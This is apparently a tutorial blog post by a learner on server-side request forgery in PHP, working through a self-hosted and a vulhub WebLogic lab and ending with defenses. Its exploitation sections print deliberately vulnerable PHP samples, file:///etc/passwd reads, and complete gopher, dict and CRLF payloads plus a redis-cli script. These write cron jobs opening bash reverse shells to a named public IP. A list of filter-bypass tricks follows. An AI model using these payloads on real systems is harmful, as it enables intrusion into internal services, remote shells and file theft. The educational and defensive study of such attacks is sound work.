0x00 Foreword
After learning about CSRF vulnerabilities I learned a lot, and I also found that SSRF and CSRF vulnerabilities are somewhat similar.
CSRF is client-side request forgery, a forged request originating from the client; SSRF is server-side request forgery, a forged request originating from the server.
Since I have not studied SSRF yet, I am setting out on the road of learning SSRF vulnerabilities!
0x01 SSRF vulnerability overview
1. SSRF vulnerability overview
SSRF (Server-Side Request Forgery) is a security flaw in which an attacker constructs a request that is then initiated by the server.
In general, the target of an SSRF attack is an internal system that is not reachable from the external network. (Because the request is initiated by the server, it can reach networks the server is connected to but which are isolated from the outside; the vulnerable service is used as a springboard to attack that network.)
2. Causes of SSRF vulnerabilities
SSRF usually arises because the server provides the ability to fetch data from other servers and applications, without filtering or restricting the destination address. Examples: fetching the text content of a web page from a specified URL, loading pictures from a specified address, downloads, and so on. Server-side request forgery abuses exactly this ability; SSRF uses the server to attack both remote and local targets.
The vulnerable web application acts as a proxy.
3. Places prone to SSRF
- Transcoding services
- Online translation
- Image loading and downloading (loading or downloading pictures through a URL address)
- Picture and article collection functions
- Site acquisition, local web crawling
- Avatar upload (remote loading of a picture)
- Anywhere a URL or IP address can be entered
- Look for URL-like parameter names; common keywords: share, wap, url, link, src, source, target, u, 3g, display, sourceURl, imageURL, domain ...
4. Attacks that can be achieved with SSRF
- Scan the external network, the internal network where the server resides, and local ports, and obtain banner information from some services
- Attack applications running on the internal network or locally
- Fingerprint internal web applications by accessing default files (such as a readme file)
- Attack internal and external web applications, mainly attacks that can be carried out through GET parameters (such as Struts2, SQLi)
- Download internal network resources (such as reading local files with the file protocol, etc.)
- Use the server as a springboard (pivot)
- Bypass a CDN
- Use Redis unauthorized access and HTTP CRLF injection to get a shell
0x02 SSRF-related functions and protocols
1. Functions
file_get_contents(), fsockopen(), curl_exec(), fopen(), readfile() and other functions can cause SSRF vulnerabilities when used improperly.
(1) file_get_contents()
<?php
$url = $_GET['url']; // URL taken directly from the user, with no check on scheme or destination
echo file_get_contents($url); // the server fetches it and returns the content to the user
?>
file_get_contents fetches the content of the user-specified URL and presents it to the user; it is often paired with file_put_contents, which writes a string to a file under a specified file name in order to save what was fetched.
(2) fsockopen()
<?php
function GetFile($host,$port,$link) {
    // open a raw TCP socket to the user-supplied host and port, 30-second timeout
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno) \n";
    } else {
        // hand-built HTTP request; $link goes into the request line unchecked
        $out = "GET $link HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $contents='';
        while (!feof($fp)) {
            $contents.= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
?>
fsockopen implements fetching the data of a user-specified URL; the function uses a socket (port) to establish a TCP connection with the server and transfer data. The variable $host is the host name, $port the port, $errstr receives the error message string, and 30 is the timeout limit.
(3) curl_exec()
<?php
if (isset($_POST['url'])) {
    $link = $_POST['url'];
    $curlobj = curl_init(); // create a new cURL resource
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // set the URL and the corresponding options
    $result = curl_exec($curlobj); // fetch the URL and return the content
    curl_close($curlobj); // close the cURL resource and free system resources
    $filename = './curled/'.rand().'.txt';
    file_put_contents($filename, $result); // save the fetched content to a file
    echo $result;
}
?>
curl_exec executes the specified cURL session.
Note
1. In general, PHP's fopen wrapper does not support the gopher protocol
2. With file_get_contents, the gopher protocol payload cannot be URL-encoded
3. file_get_contents has a bug with gopher on 302 redirects, which causes exploitation to fail
4. curl/libcurl 7.43 has a gopher protocol bug (%00 truncation); 7.49 has been tested and works
5. curl_exec() does not follow redirects by default
6. file_get_contents() supports the php://input protocol
2. Protocols
(1) file: if the response is echoed back, the file protocol can be used to read arbitrary content
(2) dict: leaks version information of installed software, views ports, operates internal services such as redis, etc.
(3) gopher: supports making GET and POST requests: first capture the GET or POST request packet, then construct it into a request that fits the gopher protocol. gopher is the most powerful protocol for SSRF (commonly called the universal protocol). It can be used to bounce a shell
(4) http/s: detecting whether network hosts are alive
0x03 SSRF exploitation
Local use
Take curl as an example; view the list of protocols supported by curl with curl -V.
Local use:
(1) Using the file protocol (arbitrary file read)
curl -vvv 'file:///etc/passwd'
(2) Using the dict protocol (obtaining Redis configuration information)
curl -vvv 'dict://127.0.0.1:6379/info'
(3) Using the gopher protocol (commonly called the universal protocol) (one-shot reverse Bash shell)
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'
Remote exploitation
1. Environment
Attacker IPs: 192.168.201.129, 121.36.67.230
Attacker machines: Kali, a public server
Remote server IP: 39.xxx
Docker image: ssrf_redis
PHP version: PHP Version 7.2.28 (the test fails on version 5.6)
As for why I deployed the service on a remote server and received the reverse shell on a public server:
because I think this simulates a real environment more realistically, which helps to gain a deeper understanding of SSRF vulnerabilities.
2. Sample code for remote exploitation
ssrf.php
<?php
$ch = curl_init(); // create a new cURL resource
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // set the URL and the appropriate options; the URL comes straight from the user
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS); // commented out: no protocol restriction, so gopher/dict/file all work
curl_exec($ch); // fetch the URL content and pass it to the browser
curl_close($ch); // close the cURL resource and free system resources
?>
post.php
<html>
<head>
<title>post</title>
</head>
<body>
<?php
echo $_REQUEST['cmd']; // echoes the cmd parameter back without any filtering
?>
</body>
</html>
3. Remote exploitation patterns
1. Using the file protocol to read arbitrary files
curl -v 'http://39.x.x.x:8000/ssrf.php?url=file:///etc/passwd'
2. Using the dict protocol
(1) View version information for a port and the service running on it
curl -v 'http://39.x.x.x:8000/ssrf.php?url=dict://127.0.0.1:22/'
The response shows that port 22 is open
(2) getshell via the dict protocol
About the dict protocol: the request is dict://server:port/command:parameter, and \r\n (CRLF) is automatically appended at the end.
With the dict protocol the commands have to be executed one by one, whereas with the gopher protocol a single request can execute them all; here they are executed one by one.
3. Using the gopher protocol
(1) Internal network attack and reverse shell with redis: redis unauthorized access attack
Exploit script for attacking redis (shell.sh):
echo -e "\n\n\n*/1 * * * * bash -i >& /dev/tcp/121.36.67.230/5555 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir /var/spool/cron/
redis-cli -h $1 -p $2 config set dbfilename root
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit
bash shell.sh 39.x.x.x 6379
Then capture the traffic and convert it; the conversion rules are as follows:
If the first character of a line is > or <, discard the line (it only records the request direction and time).
If the first three characters are +OK, discard the line (it is the returned string).
Replace \r\n with %0d%0a
Replace blank lines with %0a
Combining the gopher protocol with the attack on internal redis, use the captured and converted data above to bounce the shell:
curl -v 'http://39.x.x.x:8000/ssrf.php?url=gopher://192.168.1.4:6379/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f5555%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'
Reverse shell received successfully.
http://39.x.x.x:8000/ssrf.php is the web service with the SSRF vulnerability
192.168.1.4 is the internal network IP where redis runs
121.36.67.230 is the public network server receiving the reverse shell
(2) Forged POST request to bounce a shell
curl -v 'http://39.x.x.x:8000/ssrf.php?url=gopher://192.168.1.5:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%2039.105.93.165%250d%250aUser-Agent:%20curl/7.58.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd%3Dccccc%250d%250a%250d%250abash%20-i%20%3E%26%20%2fdev%2ftcp%2f121.36.67.230%2f4444%200%3E%261'
Reverse shell received successfully.
192.168.1.5 is an internal web service on which post.php exists
4. Using the http/s protocol to detect whether internal hosts are alive: the response indicates that the internal host 192.168.1.3 is alive
0x04 SSRF attacks in practice
1. gopher attack on redis
See Remote exploitation, 3. Using the gopher protocol
2. WebLogic SSRF attack on redis
Download: https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf
Compile and start the environment:
docker-compose build
docker-compose up -d
The SSRF vulnerability exists at http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
1. Port probing
Access
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80
// to test http://127.0.0.1:7001, replace 80 with 7001
"Could not connect" indicates port 80 is not open; a 404 return indicates the port is open.
2. Detecting internal host survival: the response indicates whether the internal host IP is alive.
3. HTTP header injection, using redis to bounce a shell
By probing the internal redis server through the SSRF, 172.22.0.2:6379 was found to be reachable, and the usage is almost the same as the remote case above. The reverse shell script is written into the /etc/crontab scheduled task:
192.168.1.1
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
After URL encoding:
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
The newline \r\n is replaced with %0D%0A. Append this URL-encoded string after the domain name in the SSRF request and send it; the reverse shell is received successfully.
0x05 SSRF vulnerability bypasses
1. Conventional bypass methods
1. @
http://abc@127.0.0.1
actually connects to the site 127.0.0.1 with the user name abc; similarly
http://abc@127.0.0.1:8080, http://127.0.0.1#8.8.8.8
Apart from resolving the domain name with @, different processing functions handle it differently, for example:
http://www.aaa.com@www.bbb.com@www.ccc.com
PHP's parse_url recognizes www.ccc.com as the host, while libcurl recognizes www.bbb.com
2. Using [::]
[::] can be used to bypass to localhost
http://[::]:80/ >>> http://127.0.0.1
3. Add a port number
http://127.0.0.1:8080
4. Use a short URL
Webmaster Tools short URL
Baidu short URL
5. Use a special domain
The principle is DNS resolution. xip.io can point to any IP:
127.0.0.1.xip.io resolves to 127.0.0.1
6. Use DNS resolution
Set an A record on a domain you control, pointing to 127.0.0.1
7. Use base conversion
127.0.0.1
Octal: 0177.0.0.1
Hex: 0x7f.0.0.1
Decimal: 2130706433
8. Full-width periods
127。0。0。1 >>> 127.0.0.1
9. 302 redirect
Use https://tinyurl.com to generate a 302 redirect address
2. Common restrictions
1. Restricted to the domain name http://www.xxx.com
Bypass using the HTTP basic authentication form, i.e. @
http://[email protected]
2. Restriction: the requested IP address must not be on the internal network
When internal network IP addresses are not permitted:
(1) use a short URL to bypass
(2) use a special domain name
(3) use base conversion
3. Restriction: only the http protocol may be requested
(1) use a 302 redirect
(2) use a short address
0x06 SSRF vulnerability defense
1. Disable unneeded protocols (e.g. file:///, gopher://, dict://, etc.); allow only http and https requests
2. Unify error messages, to prevent the error information from being used to determine port status
3. Prohibit 302 redirects, or check on every redirect whether the new Host is an internal network IP, until the final URL is reached
4. Set a URL whitelist or restrict internal network IPs
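As an added example that is not part of the original post: the vulnerable ssrf.php pattern rewritten in PHP with the four defenses above (protocol restriction, uniform errors, no redirects, destination checking). The names safe_fetch() and is_public_ip() are assumed; because it checks the address actually resolved rather than the URL text, it also covers the @, [::], base-conversion, xip.io and DNS tricks from 0x05.

```php
<?php
// Added example, not from the original post: a hardened replacement for the
// ssrf.php pattern that applies defenses 1-4 above. Names safe_fetch() and
// is_public_ip() are assumed; requires the curl extension.

// Reject loopback, private, link-local and reserved ranges (IPv4 and IPv6).
function is_public_ip(string $ip): bool {
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns the body, or null for every failure so the caller cannot tell
// "blocked" from "connection refused" (defense 2: uniform errors).
function safe_fetch(string $url): ?string {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    // Defense 1: http/https only. Any '@' is refused outright, so the
    // parse_url-vs-libcurl disagreement on "a@b@c" from 0x05 never matters.
    if (!in_array($scheme, ['http', 'https'], true) || strpos($url, '@') !== false) return null;
    $host = trim($p['host'], '[]');
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Defense 4: check the address actually connected to, not the text.
    // "0x7f.0.0.1", "2130706433", "127.1", "[::]" and "127.0.0.1.xip.io" all
    // collapse to a loopback address here (glibc resolves inet_aton forms).
    // gethostbynamel is IPv4-only, so IPv6-only host names are refused.
    $literal = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $ips = $literal ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) return null;
    foreach ($ips as $ip) { if (!is_public_ip($ip)) return null; }

    $opts = [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                            // defense 3
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // no gopher/dict/file
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ];
    // Pin the checked answer so libcurl's own DNS lookup cannot be rebound.
    if (!$literal) $opts[CURLOPT_RESOLVE] = ["$host:$port:" . $ips[0]];
    $ch = curl_init();
    curl_setopt_array($ch, $opts);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    // A 3xx is treated as failure instead of being followed (defense 3).
    return ($body !== false && $code >= 200 && $code < 300) ? $body : null;
}

echo safe_fetch($_GET['url'] ?? '') ?? 'request failed';
```

A stricter deployment would replace the resolved-address check with an explicit host whitelist, which is the other half of defense 4.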
0x07 Postscript
During the process of learning to exploit SSRF, I encountered some problems, such as bouncing the shell to the public network server, which I struggled with for a long time, but finally overcame. At the same time, through learning about SSRF vulnerabilities, I found that the limitations on exploiting SSRF are really smaller than those of CSRF vulnerabilities, and the harm of SSRF to some internal network applications is relatively large. Therefore, during development, try to avoid SSRF vulnerabilities.